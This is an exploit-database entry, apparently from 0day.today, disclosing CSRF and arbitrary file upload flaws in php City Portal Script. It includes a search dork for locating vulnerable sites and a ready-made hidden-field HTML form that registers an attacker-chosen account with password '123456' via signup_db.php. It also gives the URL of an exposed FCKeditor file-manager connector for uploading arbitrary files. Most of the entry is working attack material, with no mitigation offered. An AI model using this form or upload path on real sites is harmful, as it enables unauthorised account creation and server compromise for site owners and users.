php City Portal Script Arbitrary File Upload/CSRF Vulnerabilties

2012-05-23T00:00:00
ID 1337DAY-ID-18335
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-05-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            php City Portal Script Arbitrary File Upload/CSRF Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://phpcityportal.com/
.:. Drok           : "Powered by PHPCityPortal.com"

#######################################################################

===[ Exploit ]===


CSRF [Add User]
===============

<form method="POST" name="form0" action="http://SITE/signup_db.php">
<input type="hidden" name="req_account_type" value="regular"/>
<input type="hidden" name="req_first_name" value="....."/>
<input type="hidden" name="req_last_name" value="....."/>
<input type="hidden" name="req_email" value="....."/>
<input type="hidden" name="username" value="USER"/>
<input type="hidden" name="req_password" value="123456"/>
<input type="hidden" name="req_confirm_password" value="123456"/>
<input type="hidden" name="opt_gender" value="Male"/>
<input type="hidden" name="sel_dob_month" value="5"/>
<input type="hidden" name="sel_dob_day" value="17"/>
<input type="hidden" name="req_dob_year" value="1991"/>
<input type="hidden" name="opt_street_address" value="....."/>
<input type="hidden" name="req_city" value="....."/>
<input type="hidden" name="opt_zip" value="....."/>
<input type="hidden" name="opt_phone_number" value="....."/>
<input type="hidden" name="opt_industry" value="1"/>
<input type="hidden" name="opt_income" value="1"/>
<input type="hidden" name="opt_read_mags" value="3"/>
</form>

</body>
</html>



Remote Arbitrary File Upload
================================


http://SITE/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/Feditor/filemanager/connectors/php/connector.php

#######################################################################



#  0day.today [2018-01-10]  #